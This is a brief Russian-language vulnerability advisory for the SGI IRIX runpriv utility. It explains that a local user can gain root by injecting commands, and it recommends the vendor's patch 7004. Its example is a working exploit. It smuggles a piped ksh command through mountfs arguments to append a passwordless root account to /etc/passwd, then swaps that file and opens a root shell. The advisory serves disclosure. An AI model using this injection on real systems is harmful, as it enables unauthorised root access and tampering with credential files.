Повышение привилегий в SGI IRIX в утилите runpriv'

Описание:
Уязвимость в утилите runpriv позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует в утилите runpriv из-за небезопасного выполнения команд после проверки привилегий пользователя. Локальный пользователь с правами на запуск приложений из директории /usr/sysadm/privbin, может выполнить произвольные команды на системе с привилегиями пользователя root. Пример для пользователя с правами на запуск утилиты mountfs:

/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|
"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su"

URL производителя: www.sgi.com

Решение: Установите исправление 7004 с сайта производителя.

Источник: